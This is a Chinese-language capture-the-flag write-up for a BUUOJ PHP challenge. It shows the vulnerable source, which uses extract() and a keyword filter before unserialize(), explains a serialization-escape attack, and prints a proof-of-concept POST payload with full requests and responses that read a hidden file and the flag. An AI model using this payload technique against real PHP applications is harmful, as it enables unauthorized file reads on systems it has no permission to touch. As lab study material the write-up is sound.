<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } $_SESSION["user"] = 'guest'; $_SESSION['function'] = $function; extract($_POST); if(!$function){ echo '<a href="index.php?f=highlight_file">source_code</a>'; } if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png'); }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); } $serialize_info = filter(serialize($_SESSION)); if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here! }else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); }
这题讲的是序列化的逃逸
之前做过一个题目也是逃逸的,做法是通过题目中把'where'替换成'hacker',让序列化后的字符串多一些字符
大概就是在这题的基础上,把这题改成function等于任意字符都可以序列化,然后replace("where","hacker",array()),"hacker"比where多一个字符,然后输入46个where就可以逃逸了
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:46:"where(46个)";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
前面是写给我自己看的
下面是WP
POC:_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
在本地搭建环境POC 放在 extract()函数的后面 ,echo 序列化后的结果是
|
|
a:4{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"";s:52:"";s:11:"";s:4:"aaaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}';
flagflag被替换成空的在 ‘:"show_image";’后面本该是 ‘ s:8:"flagflag"; ’ 的 变成了 ‘ s:8:""; ’ ,所以 ";s:52:" 被覆盖了,变成了字符串,下面我把它标红
a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"";s:52:"";s:4:"aaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";
相当于
a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"12345678";s:4:"aaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
而后面被标绿的就是被遗弃的部分
发包
POST /?f=show_image HTTP/1.1
Host: e2fa180d-b401-414d-b673-d537751616e6.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://9dd213f5-91a8-4b1c-8a4e-88cab48d2d67
Content-Length: 70
Connection: close
_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
返回
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 25 Dec 2019 06:21:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 45
Connection: close
<?php
$flag = 'flag in /d0g3_fllllllag';
?>
base64(d0g3_fllllllag)=L2QwZzNfZmxsbGxsbGFn
发包
POST /?f=show_image HTTP/1.1
Host: e2fa180d-b401-414d-b673-d537751616e6.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://9dd213f5-91a8-4b1c-8a4e-88cab48d2d67
Content-Length: 70
Connection: close
_SESSION[fl1gfl1g]=";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
反包
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 25 Dec 2019 05:43:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 43
Connection: close
flag{86880642-c830-4268-a7ed-dd7c94a08514}